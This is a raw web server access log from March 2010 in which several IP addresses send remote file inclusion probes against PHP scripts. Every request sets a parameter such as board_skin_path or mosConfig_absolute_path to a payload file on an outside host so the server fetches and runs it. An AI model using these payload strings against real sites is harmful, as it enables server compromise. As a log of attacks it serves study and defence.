195.9.14.88 - - [19/Mar/2010:03:49:21 -0400] "GET /logs//?_SERVER[DOCUMENT_ROOT]=http://suzuki02.fileave.com/zfxid1.txt? HTTP/1.1" 200 42695 "-" "Mozilla/5.0"
195.9.14.88 - - [19/Mar/2010:03:49:21 -0400] "GET //?_SERVER[DOCUMENT_ROOT]=http://suzuki02.fileave.com/zfxid1.txt? HTTP/1.1" 200 452 "-" "Mozilla/5.0"
195.9.14.88 - - [19/Mar/2010:03:49:21 -0400] "GET /logs/access_log.Q109122500%20%20//?_SERVER[DOCUMENT_ROOT]=http://suzuki02.fileave.com/zfxid1.txt? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
195.9.14.88 - - [19/Mar/2010:03:49:21 -0400] "GET /logs//?_SERVER[DOCUMENT_ROOT]=http://suzuki02.fileave.com/zfxid1.txt? HTTP/1.1" 200 42695 "-" "Mozilla/5.0"
195.9.14.88 - - [19/Mar/2010:03:49:25 -0400] "GET /logs/error_log.Q109122500%20%20//?_SERVER[DOCUMENT_ROOT]=http://suzuki02.fileave.com/zfxid1.txt? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
195.9.14.88 - - [19/Mar/2010:03:49:28 -0400] "GET /logs/error_log.Q109122500%20%20//?_SERVER[DOCUMENT_ROOT]=http://suzuki02.fileave.com/zfxid1.txt? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
65.18.200.100 - - [19/Mar/2010:03:49:52 -0400] "GET /bbs//delete.php?board_skin_path=http://myslowice.activh.pl//news//inc/id1.txt??? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
65.18.200.100 - - [19/Mar/2010:03:49:52 -0400] "GET /logs/bbs//delete.php?board_skin_path=http://myslowice.activh.pl//news//inc/id1.txt??? HTTP/1.1" 404 218 "-" "Mozilla/5.0"
65.18.200.100 - - [19/Mar/2010:03:50:01 -0400] "GET /logs/access_log.Q109102300/bbs//delete.php?board_skin_path=http://myslowice.activh.pl//news//inc/id1.txt??? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
201.28.110.99 - - [19/Mar/2010:03:50:16 -0400] "GET /logs/access_log.Q110011700%20%20///write_comment_update.php?board_skin_path=http://www.mharmony.net/main//forum/id1.txt? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
84.40.30.37 - - [19/Mar/2010:03:50:24 -0400] "GET /logs/?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://wkmg.co.kr/bbs/lib/1.txt???? HTTP/1.1" 200 42690 "-" "Mozilla/5.0"
